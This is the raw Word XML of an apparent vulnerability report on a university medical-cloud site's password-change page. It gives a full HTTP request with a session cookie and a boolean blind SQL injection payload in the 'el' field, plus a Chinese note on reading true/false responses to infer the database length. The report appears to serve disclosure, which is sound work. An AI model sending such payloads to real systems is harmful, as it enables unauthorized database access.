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61B733" w14:textId="00311A8D" w:rsidR="007068BB" w:rsidRDefault="00C23362">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00B6190E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://medcloud.sjtu.edu.cn/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31B84EB1" w14:textId="4994B836" w:rsidR="00C23362" w:rsidRDefault="00C23362">
      <w:r w:rsidRPr="00C23362">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F54552D" wp14:editId="295C00BA">
            <wp:extent cx="5274310" cy="2655570"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="电脑萤幕画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电脑萤幕画面&#10;&#10;描述已自动生成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3273C" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>POST /newpsw.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4914E38A" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Host: medcloud.sjtu.edu.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416A0E8F" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Cookie: PHPSESSID=6p867sojnoe04q677t481kpf66</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBD4D3B" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25489CA3" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DADE8A3" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2A3BC" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D103A24" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Content-Type: multipart/form-data; boundary=---------------------------182597091630372249623970025361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12933E90" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Content-Length: 657</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3D8BB" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Origin: https://medcloud.sjtu.edu.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2E3D2D" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Referer: https://medcloud.sjtu.edu.cn/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EDA683" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319CE26" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Sec-Fetch-Dest: document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20066A7D" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Sec-Fetch-Mode: navigate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312FF95B" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Sec-Fetch-Site: same-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187DD787" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Sec-Fetch-User: ?1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC203C0" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Te: trailers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416AEF2" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55425DB8" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362"/>
    <w:p w14:paraId="6E123395" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>-----------------------------182597091630372249623970025361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B51CFDE" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Content-Disposition: form-data; name="el"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA0517D" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362"/>
    <w:p w14:paraId="4D62FA15" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>123' or length(database())=3#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920D104" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>-----------------------------182597091630372249623970025361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFF7B0B" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Content-Disposition: form-data; name="lpsw"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262020C0" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362"/>
    <w:p w14:paraId="399531BA" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA18D74" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>-----------------------------182597091630372249623970025361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBC6FA8" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Content-Disposition: form-data; name="npsw"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B147C0A" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362"/>
    <w:p w14:paraId="4BE756C9" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F93DFB" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>-----------------------------182597091630372249623970025361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB7B4E" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Content-Disposition: form-data; name="nnpsw"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61465738" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362"/>
    <w:p w14:paraId="628CF128" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540C885C" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>-----------------------------182597091630372249623970025361</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD822C9" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>Content-Disposition: form-data; name="submitPS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB7268" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362"/>
    <w:p w14:paraId="2F20BD26" w14:textId="77777777" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696BC4E2" w14:textId="6FDCE0C1" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r>
        <w:t>-----------------------------182597091630372249623970025361</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589BA6A7" w14:textId="5ED5E816" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该U</w:t>
      </w:r>
      <w:r>
        <w:t>RL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在sql注入，将参数如图设置，返回密码至少8位时为真，返回旧密码不正确为假，注入出数据库长度证明注入存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D48B62" w14:textId="13F8E36B" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:r w:rsidRPr="00C23362">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D006A90" wp14:editId="6F8D1F5B">
            <wp:extent cx="5274310" cy="3729355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="2" name="图片 2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形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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92F00" w14:textId="60B41CFE" w:rsidR="00C23362" w:rsidRDefault="00C23362" w:rsidP="00C23362">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C23362">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78C92193" wp14:editId="12EC28B9">
            <wp:extent cx="5274310" cy="3694430"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="3" name="图片 3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形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成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336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E81"/>
    <w:rsid w:val="007068BB"/>
    <w:rsid w:val="00BD6E81"/>
    <w:rsid w:val="00C23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BB2272"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F2EEB0BA-4961-48D6-A89C-9BC03F968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23362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C233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medcloud.sjtu.edu.cn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228</Words>
  <Characters>1305</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>10</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1530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2023-01-10T04:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-10T04:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>